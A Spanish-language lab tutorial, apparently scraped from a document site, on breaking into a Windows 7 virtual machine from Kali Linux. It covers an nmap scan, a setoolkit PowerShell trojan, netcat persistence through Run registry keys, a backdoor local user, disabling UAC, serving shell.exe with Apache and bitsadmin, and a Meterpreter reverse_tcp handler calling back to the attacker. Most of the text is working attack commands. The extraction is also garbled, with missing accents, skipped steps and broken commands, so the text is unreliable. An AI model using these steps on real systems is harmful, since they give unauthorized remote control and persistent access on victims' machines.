Академический Документы
Профессиональный Документы
Культура Документы
HackLat Nogal
LabSec
Z HackLat Nogal LabSec
Intrusin Controlada a Sistemas
Metodologa de ataque a sistemas Windows 7
Hoy en da, una intrusin la tienen bastante facil los nios en especial por el
exploit eternalblue Filtrado por "ShadowBroker" ; pero, Qu hay en un
ataque ms elaborado? Si bien, un ataque de este tipo es un tanto viejo pero
la metodologa es la misma para hacer una intrusin a un sistema informtico
Windows 7 pero bien dicen, lo bueno no significa obsoleto
Comencemos:
Que necesitamos?
2 maquinas virtuales: Windows 7 con antivirus y Kali Linux en la misma red
. Buscamos a la victima
Una de las opciones para buscar victimas en la red local es usar nmap, para
ello vamos a lanzarlo para ver que equipos,puertos y sistema operativos
estn en esa red local. nmap --open -O 192.168.1.0/24
Mi vctima sera la ip 192.168.1.43 con varios puertos abiertos y por el
resultado que nos ha dado sera un Windows 7
probablemente.
Creando el payload
Usaremos la aplicacin setoolkit en Kali para realizarle un troyano
a medida para conseguir acceso al sistema.
Los parmetros sern:
1.-(1)Social-Engineering Atacks
2.-(10)Powershell Attack Vectors
3.-(1) Powershell Alphanumeric Shellcode Injector
4.- IP: 192.168.1.67 (Ip de kali) 5.-Port:
443
set> yes
Para esto usaremos Netcat, una herramienta excelente para abrir puertos,
asociarlo a una shell y forzar conexiones.
Abrimos otra consola y ponemos: locate windows-binaries y
*Esas doble barras son para que lo lea, en caso de poner una que no
traiga la barra.
HKLM\\software\\microsoft\\windows\\currentversion\\run
HKLM\\software\\microsoft\\windows\\currentversion\\run -v Microsoft
Ahora vemos los puertos abiertos, pero vemos que no nos lo muestra.
localport=12345
Vemos que si ademas vemos que no somos los unicos con acceso y que
hay un Poison Ivy, que es un RAT para controlar equipos troyanizados.
Creamos un usuario de nombre y contrasea kali: net user kali kali /add
Tambin podemos ver grficamente, inicio > botn derecho sobre equipo "
Administrar" > Usuarios y grupos locales > Usuarios
/*Necesitaramos hacer otros cambios para ocultarlo en estos sitos*/
Ahora vamos a reiniciar a la vctima para ver si todo funciona
correctamente. Meterpreter pierde la conexin.
Una vez reiniciado veremos nuestra obra, para comprobar los cambios que
hemos hecho.
Comprobamos que el UAC esta desactivado, para ello podemos clickear en
cualquier archivo que necesite permisos de administrador para ejecutarse y
no nos saldr la ventana para aceptar.
Otra cosa interesante es probar comandos que antes tenamos con acceso
denegado y ahora nos deja como es el caso
/var/www/shell.exe
/*Esto lo detectara el antivirus, para esta prctica lo desactivamos*/
Lanzamos apache: service apache2 start
Otra opcin interesante con bitsadmin es ver los trabajos, para verlos
usaremos: bitsadmin /list
Y para analizar y ver el trabajo hacemos: bitsadmin /complete kali_linux
Pues ya que esta vamos a realizar una conexion a esta shell: msfcli
exploit/mult/handler
PAYLOAD=windows/meterpreter/reverse_tcp lhost=192.168.1.67 lport=
1234 E
Ahora desde nuestra shell de windows, nos ponemos en la ruta y
ejecutamos con: shell.exe